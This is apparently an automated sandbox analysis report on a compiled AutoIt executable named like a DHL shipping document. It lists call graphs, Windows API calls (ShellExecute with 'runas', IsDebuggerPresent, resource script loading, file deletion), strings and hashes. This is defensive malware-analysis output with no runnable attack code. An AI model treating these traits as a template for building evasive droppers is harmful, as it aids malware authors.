calls 102495->102641 102497 7bf4fd 102497->102495 102497->102498 102497->102499 102540 813c37 102498->102540 102543 7b4e4a 102498->102543 102549 81cb7a 102498->102549 102629 82445a 102498->102629 102499->102424 102501 7bf5e3 102501->102499 102639 7b9c90 59 API calls Mailbox 102501->102639 102507 7b3212 102506->102507 102508 7b31e0 102506->102508 102507->102424 102508->102507 102509 7b3205 IsDialogMessageW 102508->102509 102510 7ecf32 GetClassLongW 102508->102510 102509->102507 102509->102508 102510->102508 102510->102509 102511->102424 102512->102355 102513->102360 102514->102424 102515->102362 102516->102362 102517->102362 102518->102424 102519->102424 102520->102424 102521->102424 102522->102424 102523->102424 102524->102410 102525->102410 102526->102410 102527->102410 102528->102410 102529->102410 102530->102410 102531->102486 102532->102486 102533->102486 102534->102486 102535->102486 102536->102486 102537->102484 102538->102486 102539->102486 102642 81445a GetFileAttributesW 102540->102642 102544 7b4e54 102543->102544 102546 7b4e5b 102543->102546 102646 7d53a6 102544->102646 102547 7b4e7b FreeLibrary 102546->102547 102548 7b4e6a 102546->102548 102547->102548 102548->102501 102550 7b7667 59 API calls 102549->102550 102551 81cbaf 102550->102551 102552 7b7667 59 API calls 102551->102552 102553 81cbb8 102552->102553 102554 81cbcc 102553->102554 103103 7b9b3c 59 API calls 102553->103103 102556 7b9837 84 API calls 102554->102556 102557 81cbe9 102556->102557 102558 81cc0b 102557->102558 102559 81ccea 102557->102559 102628 81cd1a Mailbox 102557->102628 102560 7b9837 84 API calls 102558->102560 102916 7b4ddd 102559->102916 102562 81cc17 102560->102562 102564 7b8047 59 API calls 102562->102564 102566 81cc23 102564->102566 102565 81cd16 102568 7b7667 59 API calls 102565->102568 102565->102628 102572 81cc37 102566->102572 102573 81cc69 102566->102573 102567 7b4ddd 136 API calls 102567->102565 102569 81cd4b 102568->102569 102570 7b7667 59 API calls 102569->102570 102571 
81cd54 102570->102571 102574 7b7667 59 API calls 102571->102574 102575 7b8047 59 API calls 102572->102575 102576 7b9837 84 API calls 102573->102576 102578 81cd5d 102574->102578 102579 81cc47 102575->102579 102577 81cc76 102576->102577 102580 7b8047 59 API calls 102577->102580 102581 7b7667 59 API calls 102578->102581 102582 7b7cab 59 API calls 102579->102582 102583 81cc82 102580->102583 102584 81cd66 102581->102584 102585 81cc51 102582->102585 103104 814a31 GetFileAttributesW 102583->103104 102587 7b9837 84 API calls 102584->102587 102588 7b9837 84 API calls 102585->102588 102590 81cd73 102587->102590 102591 81cc5d 102588->102591 102589 81cc8b 102592 81cc9e 102589->102592 102595 7b79f2 59 API calls 102589->102595 102940 7b459b 102590->102940 102594 7b7b2e 59 API calls 102591->102594 102597 7b9837 84 API calls 102592->102597 102603 81cca4 102592->102603 102594->102573 102595->102592 102596 81cd8e 102991 7b79f2 102596->102991 102599 81cccb 102597->102599 103105 8137ef 75 API calls Mailbox 102599->103105 102602 81cdd1 102604 7b8047 59 API calls 102602->102604 102603->102628 102606 81cddf 102604->102606 102605 7b79f2 59 API calls 102607 81cdae 102605->102607 102608 7b7b2e 59 API calls 102606->102608 102607->102602 102610 7b7bcc 59 API calls 102607->102610 102609 81cded 102608->102609 102612 7b7b2e 59 API calls 102609->102612 102611 81cdc3 102610->102611 102613 7b7bcc 59 API calls 102611->102613 102614 81cdfb 102612->102614 102613->102602 102615 7b7b2e 59 API calls 102614->102615 102616 81ce09 102615->102616 102617 7b9837 84 API calls 102616->102617 102618 81ce15 102617->102618 102994 814071 102618->102994 102620 81ce26 102621 813c37 3 API calls 102620->102621 102622 81ce30 102621->102622 102623 7b9837 84 API calls 102622->102623 102627 81ce61 102622->102627 102624 81ce4e 102623->102624 103048 819155 102624->103048 102626 7b4e4a 84 API calls 102626->102628 102627->102626 102628->102501 102630 7b9837 84 API calls 102629->102630 102631 824494 102630->102631 103403 7b6240 
103971->103974 103975 7b6b78 103972->103975 103976 7b6b18 103973->103976 103977 7ee46c 103974->103977 103978 7b7667 59 API calls 103975->103978 103979 7b4750 60 API calls 103976->103979 103980 7b4ddd 136 API calls 103977->103980 103982 7b6b81 103978->103982 103983 7b6b26 103979->103983 103981 7ee488 103980->103981 103984 7ee4b1 103981->103984 103987 81955b 122 API calls 103981->103987 103985 7b459b 59 API calls 103982->103985 104072 7b5850 ReadFile SetFilePointerEx 103983->104072 104087 80f7a1 89 API calls 4 library calls 103984->104087 103988 7b6b98 103985->103988 103991 7ee4a4 103987->103991 103992 7b7b2e 59 API calls 103988->103992 103990 7b6b52 104073 7b5aee SetFilePointerEx SetFilePointerEx 103990->104073 103995 7ee4ac 103991->103995 103996 7ee4cd 103991->103996 103997 7b6ba9 SetCurrentDirectoryW 103992->103997 103993 7ee4c8 104024 7b6d0c Mailbox 103993->104024 103998 7b4e4a 84 API calls 103995->103998 103999 7b4e4a 84 API calls 103996->103999 104002 7b6bbc Mailbox 103997->104002 103998->103984 104000 7ee4d2 103999->104000 104001 7d0db6 Mailbox 59 API calls 104000->104001 104007 7ee506 104001->104007 104004 7d0db6 Mailbox 59 API calls 104002->104004 104006 7b6bcf 104004->104006 104008 7b522e 59 API calls 104006->104008 104009 7b750f 59 API calls 104007->104009 104064 7b57d4 104024->104064 104047 7d0db6 Mailbox 59 API calls 104046->104047 104048 80f76d _memmove 104047->104048 104048->103929 104050 81738a 104049->104050 104051 7d0db6 Mailbox 59 API calls 104050->104051 104052 8173a1 104051->104052 104053 7b7de1 59 API calls 104052->104053 104054 8173b0 104052->104054 104053->104054 104054->103929 104056 7b7370 104055->104056 104059 7b741e 104055->104059 104058 7d0db6 Mailbox 59 API calls 104056->104058 104060 7b73a2 104056->104060 104057 7d0db6 59 API calls Mailbox 104057->104060 104058->104060 104059->103929 104060->104057 104060->104059 104061->103931 104062->103929 104063->103940 104065 7b5c6f CloseHandle 104064->104065 104066 7b57dc Mailbox 104065->104066 
104067 7b5c6f CloseHandle 104066->104067 104069->103959 104070->103961 104071->103969 104072->103990 104073->103968 104085->103958 104086->103965 104087->103993 104111 7b1066 104116 7bf76f 104111->104116 104113 7b106c 104114 7d2d40 __cinit 67 API calls 104113->104114 104115 7b1076 104114->104115 104117 7bf790 104116->104117 104149 7cff03 104117->104149 104121 7bf7d7 104122 7b7667 59 API calls 104121->104122 104123 7bf7e1 104122->104123 104124 7b7667 59 API calls 104123->104124 104125 7bf7eb 104124->104125 104126 7b7667 59 API calls 104125->104126 104127 7bf7f5 104126->104127 104128 7b7667 59 API calls 104127->104128 104129 7bf833 104128->104129 104130 7b7667 59 API calls 104129->104130 104131 7bf8fe 104130->104131 104159 7c5f87 104131->104159 104135 7bf930 104136 7b7667 59 API calls 104135->104136 104137 7bf93a 104136->104137 104187 7cfd9e 104137->104187 104139 7bf981 104140 7bf991 GetStdHandle 104139->104140 104141 7f45ab 104140->104141 104142 7bf9dd 104140->104142 104141->104142 104144 7f45b4 104141->104144 104143 7bf9e5 OleInitialize 104142->104143 104143->104113 104194 816b38 64 API calls Mailbox 104144->104194 104146 7f45bb 104195 817207 CreateThread 104146->104195 104148 7f45c7 CloseHandle 104148->104143 104196 7cffdc 104149->104196 104152 7cffdc 59 API calls 104153 7cff45 104152->104153 104154 7b7667 59 API calls 104153->104154 104155 7cff51 104154->104155 104156 7b7bcc 59 API calls 104155->104156 104157 7bf796 104156->104157 104158 7d0162 6 API calls 104157->104158 104158->104121 104160 7b7667 59 API calls 104159->104160 104161 7c5f97 104160->104161 104162 7b7667 59 API calls 104161->104162 104163 7c5f9f 104162->104163 104203 7c5a9d 104163->104203 104166 7c5a9d 59 API calls 104167 7c5faf 104166->104167 104168 7b7667 59 API calls 104167->104168 104169 7c5fba 104168->104169 104170 7d0db6 Mailbox 59 API calls 104169->104170 104171 7bf908 104170->104171 104172 7c60f9 104171->104172 104173 7c6107 104172->104173 104174 7b7667 59 API calls 104173->104174 104175 
7c6112 104174->104175 104176 7b7667 59 API calls 104175->104176 104177 7c611d 104176->104177 104178 7b7667 59 API calls 104177->104178 104179 7c6128 104178->104179 104180 7b7667 59 API calls 104179->104180 104181 7c6133 104180->104181 104182 7c5a9d 59 API calls 104181->104182 104183 7c613e 104182->104183 104184 7d0db6 Mailbox 59 API calls 104183->104184 104185 7c6145 RegisterWindowMessageW 104184->104185 104185->104135 104188 7cfdae 104187->104188 104189 80576f 104187->104189 104190 7d0db6 Mailbox 59 API calls 104188->104190 104206 819ae7 60 API calls 104189->104206 104193 7cfdb6 104190->104193 104192 80577a 104193->104139 104194->104146 104195->104148 104207 8171ed 65 API calls 104195->104207 104197 7b7667 59 API calls 104196->104197 104198 7cffe7 104197->104198 104199 7b7667 59 API calls 104198->104199 104200 7cffef 104199->104200 104201 7b7667 59 API calls 104200->104201 104202 7cff3b 104201->104202 104202->104152 104204 7b7667 59 API calls 104203->104204 104205 7c5aa5 104204->104205 104205->104166 104206->104192 104208 7b1016 104213 7b4974 104208->104213 104211 7d2d40 __cinit 67 API calls 104212 7b1025 104211->104212 104214 7d0db6 Mailbox 59 API calls 104213->104214 104215 7b497c 104214->104215 104216 7b101b 104215->104216 104220 7b4936 104215->104220 104216->104211 104221 7b493f 104220->104221 104222 7b4951 104220->104222 104223 7d2d40 __cinit 67 API calls 104221->104223 104224 7b49a0 104222->104224 104223->104222 104225 7b7667 59 API calls 104224->104225 104226 7b49b8 GetVersionExW 104225->104226 104227 7b7bcc 59 API calls 104226->104227 104228 7b49fb 104227->104228 104229 7b7d2c 59 API calls 104228->104229 104232 7b4a28 104228->104232 104230 7b4a1c 104229->104230 104231 7b7726 59 API calls 104230->104231 104231->104232 104233 7b4a93 GetCurrentProcess IsWow64Process 104232->104233 104235 7ed864 104232->104235 104234 7b4aac 104233->104234 104236 7b4b2b GetSystemInfo 104234->104236 104237 7b4ac2 104234->104237 104238 7b4af8 104236->104238 104248 7b4b37 
104237->104248 104238->104216 104241 7b4b1f GetSystemInfo 104244 7b4ae9 104241->104244 104242 7b4ad4 104243 7b4b37 2 API calls 104242->104243 104245 7b4adc GetNativeSystemInfo 104243->104245 104244->104238 104246 7b4aef FreeLibrary 104244->104246 104245->104244 104246->104238 104249 7b4ad0 104248->104249 104250 7b4b40 LoadLibraryA 104248->104250 104249->104241 104249->104242 104250->104249 104251 7b4b51 GetProcAddress 104250->104251 104251->104249 104252 7b1055 104257 7b2649 104252->104257 104255 7d2d40 __cinit 67 API calls 104256 7b1064 104255->104256 104258 7b7667 59 API calls 104257->104258 104259 7b26b7 104258->104259 104264 7b3582 104259->104264 104261 7b2754 104263 7b105a 104261->104263 104267 7b3416 59 API calls 2 library calls 104261->104267 104263->104255 104268 7b35b0 104264->104268 104267->104261 104269 7b35a1 104268->104269 104270 7b35bd 104268->104270 104269->104261 104270->104269 104271 7b35c4 RegOpenKeyExW 104270->104271 104271->104269 104272 7b35de RegQueryValueExW 104271->104272 104273 7b35ff 104272->104273 104274 7b3614 RegCloseKey 104272->104274 104273->104274 104274->104269

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007B3B68
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 007B3B7A
                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,008752F8,008752E0,?,?), ref: 007B3BEB
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                      • Part of subcall function 007C092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007B3C14,008752F8,?,?,?), ref: 007C096E
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007B3C6F
                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00867770,00000010), ref: 007ED281
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,008752F8,?,?,?), ref: 007ED2B9
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00864260,008752F8,?,?,?), ref: 007ED33F
                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 007ED346
                                                                                      • Part of subcall function 007B3A46: GetSysColorBrush.USER32(0000000F), ref: 007B3A50
                                                                                      • Part of subcall function 007B3A46: LoadCursorW.USER32(00000000,00007F00), ref: 007B3A5F
                                                                                      • Part of subcall function 007B3A46: LoadIconW.USER32(00000063), ref: 007B3A76
                                                                                      • Part of subcall function 007B3A46: LoadIconW.USER32(000000A4), ref: 007B3A88
                                                                                      • Part of subcall function 007B3A46: LoadIconW.USER32(000000A2), ref: 007B3A9A
                                                                                      • Part of subcall function 007B3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007B3AC0
                                                                                      • Part of subcall function 007B3A46: RegisterClassExW.USER32(?), ref: 007B3B16
                                                                                      • Part of subcall function 007B39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B3A03
                                                                                      • Part of subcall function 007B39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3A24
                                                                                      • Part of subcall function 007B39D5: ShowWindow.USER32(00000000,?,?), ref: 007B3A38
                                                                                      • Part of subcall function 007B39D5: ShowWindow.USER32(00000000,?,?), ref: 007B3A41
                                                                                      • Part of subcall function 007B434A: _memset.LIBCMT ref: 007B4370
                                                                                      • Part of subcall function 007B434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B4415
                                                                                    Strings
                                                                                    • This is a third-party compiled AutoIt script., xrefs: 007ED279
                                                                                    • runas, xrefs: 007ED33A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                    • API String ID: 529118366-3287110873
                                                                                    • Opcode ID: d404285e140fdb4c54e55b3a113297dfd197b488d3b969519b9da20af4a765b2
                                                                                    • Instruction ID: 9173bba10b088c3350b655a9c89661c4e3279febfde41d9a228707618d8f6358
                                                                                    • Opcode Fuzzy Hash: d404285e140fdb4c54e55b3a113297dfd197b488d3b969519b9da20af4a765b2
                                                                                    • Instruction Fuzzy Hash: 9951D330D08248EADF11EBF4DC0DFED7B79BB45710F004069F525A22A7DAB89A85CB61

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 007B49CD
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    • GetCurrentProcess.KERNEL32(?,0083FAEC,00000000,00000000,?), ref: 007B4A9A
                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 007B4AA1
                                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 007B4AE7
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 007B4AF2
                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 007B4B23
                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 007B4B2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1986165174-0
                                                                                    • Opcode ID: 66a1595209c89956d19d850fc3fb043eed510492cfe661e114e626bccaafd4b1
                                                                                    • Instruction ID: 248d24d7f7c28e7fb18c74f5e49553b9f52d36a23f3fc6d208e90811ad1230da
                                                                                    • Opcode Fuzzy Hash: 66a1595209c89956d19d850fc3fb043eed510492cfe661e114e626bccaafd4b1
                                                                                    • Instruction Fuzzy Hash: 4291C63198A7C0DEC731DB7899506EBFFF5AF6A300B444D6ED0C793A42D228A908C759

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007B4D8E,?,?,00000000,00000000), ref: 007B4E99
                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007B4D8E,?,?,00000000,00000000), ref: 007B4EB0
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,007B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007B4E2F), ref: 007ED937
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,007B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007B4E2F), ref: 007ED94C
                                                                                    • LockResource.KERNEL32(007B4D8E,?,?,007B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007B4E2F,00000000), ref: 007ED95F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                    • String ID: SCRIPT
                                                                                    • API String ID: 3051347437-3967369404
                                                                                    • Opcode ID: 5f7066001a85da276c01757ec96672ccd90e109930c349dfb76132fb9d4f8c54
                                                                                    • Instruction ID: 3540753ac35e2de54c40ee0a4afc733be214a8ffe631ae2b47a18f086e75e84c
                                                                                    • Opcode Fuzzy Hash: 5f7066001a85da276c01757ec96672ccd90e109930c349dfb76132fb9d4f8c54
                                                                                    • Instruction Fuzzy Hash: 8E115A75640700BFDB218B65EC48F677BBAFBC5B11F204668F506C6262DB61EC008AA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID:
                                                                                    • API String ID: 3964851224-0
                                                                                    • Opcode ID: a0db12ad00e79627b5adbfcd208362b3c766af835458cd530746a519080bc85d
                                                                                    • Instruction ID: 0d48ee2633d638c13c90c1e67e40c879d49a99513f3ec6400ecb31940da7c283
                                                                                    • Opcode Fuzzy Hash: a0db12ad00e79627b5adbfcd208362b3c766af835458cd530746a519080bc85d
                                                                                    • Instruction Fuzzy Hash: B9925570608341CFD720DF28C484B6ABBE5BF85304F14896DE99A9B362D779EC45CB92
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,007EE398), ref: 0081446A
                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0081447B
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081448B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                    • String ID:
                                                                                    • API String ID: 48322524-0
                                                                                    Strings
                                                                                    • Variable must be of type 'Object'., xrefs: 007F3E62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                    • API String ID: 0-109567571
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C0A5B
                                                                                    • timeGetTime.WINMM ref: 007C0D16
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C0E53
                                                                                    • Sleep.KERNEL32(0000000A), ref: 007C0E61
                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 007C0EFA
                                                                                    • DestroyWindow.USER32 ref: 007C0F06
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007C0F20
                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 007F4E83
                                                                                    • TranslateMessage.USER32(?), ref: 007F5C60
                                                                                    • DispatchMessageW.USER32(?), ref: 007F5C6E
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007F5C82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                    • API String ID: 4212290369-3242690629

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00818F5F: __time64.LIBCMT ref: 00818F69
                                                                                      • Part of subcall function 007B4EE5: _fseek.LIBCMT ref: 007B4EFD
                                                                                    • __wsplitpath.LIBCMT ref: 00819234
                                                                                      • Part of subcall function 007D40FB: __wsplitpath_helper.LIBCMT ref: 007D413B
                                                                                    • _wcscpy.LIBCMT ref: 00819247
                                                                                    • _wcscat.LIBCMT ref: 0081925A
                                                                                    • __wsplitpath.LIBCMT ref: 0081927F
                                                                                    • _wcscat.LIBCMT ref: 00819295
                                                                                    • _wcscat.LIBCMT ref: 008192A8
                                                                                      • Part of subcall function 00818FA5: _memmove.LIBCMT ref: 00818FDE
                                                                                      • Part of subcall function 00818FA5: _memmove.LIBCMT ref: 00818FED
                                                                                    • _wcscmp.LIBCMT ref: 008191EF
                                                                                      • Part of subcall function 00819734: _wcscmp.LIBCMT ref: 00819824
                                                                                      • Part of subcall function 00819734: _wcscmp.LIBCMT ref: 00819837
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00819452
                                                                                    • _wcsncpy.LIBCMT ref: 008194C5
                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 008194FB
                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00819511
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00819522
                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00819534
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                    • String ID:
                                                                                    • API String ID: 1500180987-0

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 007B3074
                                                                                    • RegisterClassExW.USER32(00000030), ref: 007B309E
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B30AF
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 007B30CC
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B30DC
                                                                                    • LoadIconW.USER32(000000A9), ref: 007B30F2
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B3101
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 007B3074
                                                                                    • RegisterClassExW.USER32(00000030), ref: 007B309E
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B30AF
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 007B30CC
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B30DC
                                                                                    • LoadIconW.USER32(000000A9), ref: 007B30F2
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B3101
                                                                                    Memory Dump Source
